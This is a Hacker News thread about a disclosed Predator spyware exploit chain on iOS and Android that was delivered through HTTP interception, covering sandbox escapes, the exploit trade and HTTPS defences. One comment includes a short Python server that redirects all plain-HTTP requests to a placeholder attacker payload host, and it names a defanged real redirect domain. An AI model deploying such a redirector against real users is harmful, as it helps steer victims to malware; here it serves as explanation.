       | redirects coming from text msgs. NOT from Egypt. Maybe paranoid.
       | Offline / on new Linux devices for now.
        
         | [deleted]
        
       | Macha wrote:
       | It's good to get some more info, but it is a little disconcerting
       | that they only mention patching Chrome. What was the sandbox
       | escape on Android? Even if you had code execution inside the
       | Chrome process on Android, that shouldn't be enough to enable
       | persistence, so clearly there's another vulnerability.
       | 
       | Also in this case the attack vector was MITM of http and one time
       | links as it was a targeted campaign, but it feels like there's
       | nothing preventing someone from putting this in an ad campaign or
       | sms/discord/matrix/whatever spam and spraying it everywhere to
       | build a botnet or steal user credentials or whatever.
        
         | fullspectrumdev wrote:
         | They state that they were unable to capture the follow-on
         | stages of the Android chain, they only got the initial
         | execution component.
         | 
         | Which means a sandbox escape and a privilege elevation bug
         | are still missing.
         | 
         | Also yes, while delivery here was apparently ISP-level MiTM
         | using lawful intercept capabilities, there's no reason the
         | exploit couldn't be delivered as a 1click via a phishing link.
        
         | toasterblender wrote:
         | > What was the sandbox escape on Android? Even if you had code
         | execution inside the Chrome process on Android, that shouldn't
         | be enough to enable persistence, so clearly there's another
         | vulnerability.
         | 
         | This is such a crucial point. Forced to read between the lines
         | of the blog post (because the above information is missing), it
         | sounds like there are currently unpatched issues in Android
         | revolving around this?
        
           | fredgrott wrote:
           | Read it again: no sandbox attack on Android, just the MITM
           | and one-time link attack.
        
           | fullspectrumdev wrote:
           | Likely yes, they were unable to capture the following stages
           | so they don't know what was exploited after gaining initial
           | execution within the chrome sandbox.
           | 
           | Likely there's a chrome sandbox escape and a kernel exploit
           | remaining "unknown and unpatched".
        
             | vdfs wrote:
             | > Likely there's a chrome sandbox escape and a kernel
             | exploit remaining "unknown and unpatched".
             | 
             | There are certainly many of those that we don't know about.
             | If this was done in Egypt, imagine what a three-letter
             | agency has.
        
         | kramerger wrote:
         | The article is mainly about the iphone exploit chain: Safari
         | exploit -> PAC bypass -> kernel exploit.
         | 
         | Android version was pretty similar but I think needed two more
         | exploits to bypass Linux kernel mitigations.
         | 
         | PZ has a good technical writeup.
        
           | Macha wrote:
           | The only recent Project Zero write-up about Android sandbox
           | escapes appears to be on a different, ALSA-based and
           | Samsung-specific vulnerability.
        
           | 3abiton wrote:
           | Who is PZ?
        
             | popey456963 wrote:
             | Google's Project Zero.
        
         | waihtis wrote:
         | I'm not well versed in mobile environments. Presumably breaking
         | out of the Chrome sandbox would land you within the underlying
         | OS. Can you not build persistence there without abusing further
         | vulns?
        
           | Macha wrote:
           | There's nested sandboxes for browsers in mobile environments.
           | There's the inner layer which the web content is running in,
           | but then the browser itself is sandboxed so it can't do
           | things like access OS APIs it doesn't have permission for,
           | install apps that run in the background, etc. This is why the
           | iOS example needed 3 exploits chained. The fact that a
           | similar example worked on Android, which also has app
           | sandboxing, implies there should be an exploit chain but
           | we've only been told of the first.
        
             | waihtis wrote:
             | Gotcha, thank you.
        
             | codedokode wrote:
             | But browsers, especially Chrome, have lots of permissions
             | (including geolocation, accessing SD card, accessing user's
             | personal data, camera and microphone etc.). You don't need
             | to do anything if you can run with browser privileges.
        
               | roblabla wrote:
               | None of the mentioned privileges should net you a
               | persistence though, so there's clearly still another
               | vulnerability.
        
             | tester756 wrote:
             | that sounds like a terrible joke
             | 
             | sandbox in sandbox in sandbox in sandbox in sandbox in
             | sandbox in sandbox
             | 
             | and stuff still manages to escape
        
               | appplication wrote:
               | That's the thing about sand. It's coarse and rough and
               | irritating and it gets everywhere.
        
               | hollander wrote:
               | But there is always time for a glass of good wine!
        
             | insanitybit wrote:
             | There's also SELinux on Android.
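             | 
             | (Quick way to check that on your own device, assuming you
             | have adb set up; getenforce is the relevant command:)
             | 
             |   import subprocess
             | 
             |   out = subprocess.run(
             |       ["adb", "shell", "getenforce"],
             |       capture_output=True, text=True, check=True)
             |   # Expect "Enforcing" on any stock, recent device.
             |   print(out.stdout.strip())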
        
           | fullspectrumdev wrote:
           | On Android, you usually need three exploits.
           | 
           | 1. Chrome code execution (gain foothold inside Chrome
           | process).
           | 
           | 2. Sandbox escape (gain code execution outside the Chrome
           | sandbox, with the privileges of the Chrome process, which
           | aren't very useful except to stage another exploit).
           | 
           | 3. Local privilege escalation, usually a kernel bug or
           | similar, to elevate to root where you can break the process
           | "sandbox" and establish persistence.
        
       | [deleted]
        
         | [deleted]
        
       | fh9302 wrote:
       | The article doesn't mention it but Lockdown Mode on iOS blocked
       | this exploit chain.
        
       | shmatt wrote:
       | Another company founded by ex-Israeli intelligence.
       | 
       | The funny thing about exploits is, once hundreds of employees or
       | soldiers have access to the exploit, they don't need to
       | physically copy the code. They just need to understand how it
       | works, to then open 10 other companies that use the same exploit,
       | or sell it to 20 other companies on the dark web.
       | 
       | Although the IDF is great at stopping people from copying files
       | outside of their networks, it can't stop people from remembering
       | what they did during their service
        
         | alephnerd wrote:
         | For every 1 zero day, there are around 10-20 others that
         | haven't been publicized. You can make plenty of money by trying
         | to find a niche and concentrating on that (eg. android
         | exploitation, iOS exploitation, Windows exploitation, APAC
         | buyers, US Defense buyers, Middle Eastern buyers, EU buyers,
         | etc).
        
         | [deleted]
        
       | arkj wrote:
       | A Google search for intellexa results in an http site which got
       | redirected. I am now installing the update.
        
       | [deleted]
        
       | alephnerd wrote:
       | Slightly related, but Senator Bob Menendez was just indicted for
       | taking bribes from people connected with the Egyptian military
       | [0]. Gotta say, the Egyptian intelligence services are definitely
       | punching above their weight by regional power standards.
       | 
       | [0] - https://www.politico.com/news/2023/09/22/egypt-guns-money-
       | me...
        
         | Ozzie_osman wrote:
         | From the Google disclosure I can't tell what Egypt has to do
         | with this though. Intellexa is a Greek firm founded by an ex-
         | IDF (aka Israeli) guy. In general, while Egypt has definitely
         | been caught using tech like this, it rarely has the
         | sophistication to develop it itself.
        
         | lainga wrote:
         | Hey, they nearly destroyed the Ottoman Empire in the 1840s...
        
         | KoftaBob wrote:
         | Probably part of the long running (now peaceful) rivalry they
         | have with Israel.
        
           | alephnerd wrote:
           | Yep! Totally forgot about that!
        
         | WarOnPrivacy wrote:
         | > Senator Bob Menendez was just indicted for taking bribes from
         | people connected with the Egyptian military
         | 
         | At a federal level law/power is continually traded for
         | cash/favors. Heck, DoJ itself gets deployed in response to
         | lobbyist demands (eg:copyright enforcement).
         | 
         | From what I see this case was egregious _and_ involved a non-
         | favored foreign state. Maybe that's the bar at which DoJ
         | begins to care about political ethics.
        
           | pakyr wrote:
           | > involved a non-favored foreign state
           | 
           | Egypt is not 'non-favored'. The US has very close ties with
           | Egypt's dictatorial regime[0], despite its awful domestic
           | human rights record[1].
           | 
           | [0]https://thehill.com/blogs/congress-blog/foreign-
           | policy/58552...
           | 
           | [1]https://www.amnesty.org/en/latest/news/2022/09/egypt-
           | human-r...
        
             | WarOnPrivacy wrote:
             | > Egypt is not 'non-favored'.
             | 
             | The WTO sets the MFN list and Egypt isn't on it so strictly
             | speaking you aren't correct.
             | 
             | Besides incurring WTO favor, the US also bestows its own
             | preferential treatments to those same nations. Egypt has
             | long received many of those preferences so you're right in
             | the ways that are most relevant.
             | 
             | That said, I wouldn't place Egypt on the US's _BFFs! Top
             | partners in crime_ list - the one that includes 5/8 eyes
             | nations and Israel.
        
           | alephnerd wrote:
           | > law/power is continually traded for cash/favors
           | 
           | I worked on the Hill and that's not how it works. Yes,
           | lobbying happens, but what Menendez is indicted for goes
           | well beyond anything a lobbyist would do legally. On top of
           | that, foreign lobbyists need to formally register with the
           | DoJ, which obviously didn't happen, but that's just the icing
           | on the cake.
        
             | WarOnPrivacy wrote:
             | >> law/power is continually traded for cash/favors
             | 
             | > I worked on the Hill and that's not how it works.
             | 
             | You are asserting that law/power is not continually traded
             | for cash/favors. That's a pretty clear assertion and I
             | appreciate it.
             | 
             | To follow, you would also assert that this chain doesn't
             | exist in any meaningful way:
             | 
             | Major campaign donations are used by a legislator -> The
             | legislator benefiting from those funds is critical to the
             | creation of a law/regulation, or to a federal action, that
             | is favorable to the donor -> Influential/lucrative positions
             | that benefit the legislator (or their interests) _are made
             | available to the legislator (during/after the elected
             | term)_ by the donor.
             | 
             | recap: You are asserting that what I describe above is not
             | occurring on an ongoing basis, correct?
        
         | [deleted]
        
       | hedora wrote:
       | HTTPS is better than nothing, and this attack relies on HTTP to
       | inject the initial payload, but state-sponsored attackers in
       | some countries can likely just subvert CA or CDN infrastructure
       | instead.
        
         | pipo234 wrote:
         | Or get someone to click on a spoofed domain, certified by our
         | beloved LetsEncrypt! Apparently all that is needed is an HTTP
         | 302/307 redirect response (or an HTML redirect payload, maybe
         | even DNS?) pointing the client toward c.betly[.]me
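         | 
         | To make the "all that is needed" point concrete, here's a
         | minimal sketch (standard-library Python; attacker.example and
         | port 8080 are placeholders, and a real on-path box would
         | rewrite responses in transit rather than serve them itself) of
         | answering any plain-HTTP request with a blanket 302:
         | 
         |     from http.server import BaseHTTPRequestHandler, HTTPServer
         | 
         |     TARGET = "https://attacker.example/payload"  # placeholder
         | 
         |     class Redirector(BaseHTTPRequestHandler):
         |         def do_GET(self):
         |             # Redirect every plain-HTTP GET to the payload host.
         |             self.send_response(302)  # or 307
         |             self.send_header("Location", TARGET)
         |             self.end_headers()
         | 
         |     HTTPServer(("127.0.0.1", 8080), Redirector).serve_forever()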
        
           | jefftk wrote:
           | _> certified by our beloved LetsEncrypt_
           | 
           | Are you saying that CAs should be refusing to issue certs for
           | potentially spoofed domains?
        
             | pipo234 wrote:
             | ...or Digicert, Globalsign, the Hongkong post office,
             | whichever CA is in your truststore.
             | 
             | I just mentioned LetsEncrypt because it's free and
             | exceptionally easy to use. I'm not implying in any way they
             | aren't providing a great service, it's just that that
             | service also gets misused because it's cheap and easy.
        
               | xcdzvyn wrote:
               | It really sounds that way, FYI. I interpreted it as a dig
               | at LetsEncrypt in particular.
        
               | pipo234 wrote:
               | Please accept my apologies :-)
        
           | glaucon wrote:
           | I'm interested in your suggestion that Digicert et al are
           | doing some sort of "keeping the streets safe" checking. I
           | have zero experience of using them, but I thought all they
           | were doing was confirming the applicant represented some
           | entity that matched the domain name. If I manage to get a
           | company registered called G00gle, buy a corresponding domain
           | and then send them my $500, are you suggesting they're going
           | to refuse to issue a certificate?
           | 
           | My impression was the CAs made the likes of Standard & Poor's
           | look rigorous, but I'm happy to learn more from actual
           | experience of them rejecting such an application.
        
             | pipo234 wrote:
             | You are absolutely right that (for plain domain
             | validation) paid CAs are exactly as trustworthy as
             | LetsEncrypt, and often much less (remember the DigiNotar
             | debacle, for example). "Keeping the streets safe" is not
             | their responsibility, except in a very limited sense. The
             | $500 extended validation was mostly paperwork and snake
             | oil.
             | 
             | My point wasn't to discredit LetsEncrypt, but to point out
             | that Google's claim to mitigate the MITM attack vector
             | with _https-first_ wasn't a very strong argument. I mean,
             | yes, sure: if you can't intercept or downgrade to HTTP,
             | the MITM doesn't work. But all the HTTP step seems to do
             | is _redirect_ to a malicious payload, and you can also do
             | a redirect over HTTPS.
             | 
             | So if you can spoof someone to go to https://g00gle.com/ it
             | should be just as easy to launch the attack chain from
             | there.
        
             | vngzs wrote:
             | I don't see GP claiming CAs should be checking
             | reputability when issuing domain-validated certs. But the
             | thread originator mentioned subverting CAs! Something to
             | remember about even
             | the most advanced attackers is that they value the
             | continued effectiveness of their tactics, tools and
             | procedures. Even nation-states in possession of CA
             | subversion abilities won't burn their malicious CA on
             | someone if they can conduct the attack with a legitimately-
             | issued certificate, and they won't bother with a
             | legitimately-issued cert if they can conduct the attack
             | without even involving a CA.
        
               | glaucon wrote:
               | I was referring to this comment
               | https://news.ycombinator.com/item?id=37615985
        
             | [deleted]
        
           | insanitybit wrote:
           | Huge difference between being tricked into clicking a link vs
           | just browsing the web and getting owned.
        
             | aidos wrote:
             | Is there?
        
               | insanitybit wrote:
               | Yes. The move from 0-click to 1-click exploits (thanks to
               | putting Flash/Java behind a click) in the early 2000s
               | marked a massive negative shift in attacker capabilities
               | and ultimately destroyed multiple (black market) exploit
               | dev businesses.
        
               | fullspectrumdev wrote:
               | "Click to play" bypasses became incredibly valuable as an
               | enabler for Flash/Java exploits, for a while. They were
               | also few and far between, and if memory serves me,
               | unreliable as fuck.
        
               | pipo234 wrote:
               | It definitely matters. Just think about how much Dr. Evil
               | would pay for an exploit that relies on user action versus
               | one that doesn't.
               | 
               | https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
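               | 
               | For a rough sense of scale (generic CVSS v3.1 base
               | vectors, not scores assigned to this specific chain): an
               | otherwise identical network-exploitable, high-impact
               | vector drops from Critical to High once a click is
               | required:
               | 
               |     AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H -> 9.8 (Critical)
               |     AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H -> 8.8 (High)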
        
               | autoexec wrote:
               | I can probably avoid being tricked into clicking a link;
               | I've avoided many, many attempts to trick me in the past.
               | I probably can't avoid browsing the internet, though.
        
       | adm_ wrote:
       | Related recent episode of Darknet Diaries about the Predator
       | spyware: https://darknetdiaries.com/episode/137/.
        
       | cotillion wrote:
       | Ouch.
       | 
       | Apparently Firefox also has "HTTPS-First", but it requires the
       | pref dom.security.https_first to be set.
       | 
       | "HTTPS-Only Mode" is obviously best if you can use it.
        
         | rany_ wrote:
         | You'd still need to resist the urge to press "allow me
         | anyway", and to be honest, even I'd click it knowing the risk
         | (I just want to visit the damn site!). This doesn't solve
         | anything unless the prompt is extremely suspicious (like the
         | prompt showing up for Google.com or some other site I know
         | supports HTTPS).
        
           | rany_ wrote:
           | Replying to myself, but also: they could easily trick you
           | into clicking some link and exploit you that way. HTTP isn't
           | the root issue here; it's just being abused so they don't
           | have to get you to click anything.
           | 
           | In all likelihood they'd fall back to that if the less
           | direct/obvious delivery method didn't work.
        
       | AtNightWeCode wrote:
       | I don't get it. If it's over HTTP then you can tamper with
       | anything in a proxy. There is no TLS tunnel, so it's not
       | encrypted. That's by design.
        
         | vngzs wrote:
         | That's just the delivery method, not the exploit.
        
         | d3w4s9 wrote:
         | Yes, it's not encrypted, and the response returned from the
         | server can be modified into anything (it could ask for a
         | password, etc.), but that is far from an exploit that runs
         | native code.
        
       ___________________________________________________________________
       (page generated 2023-09-22 23:00 UTC)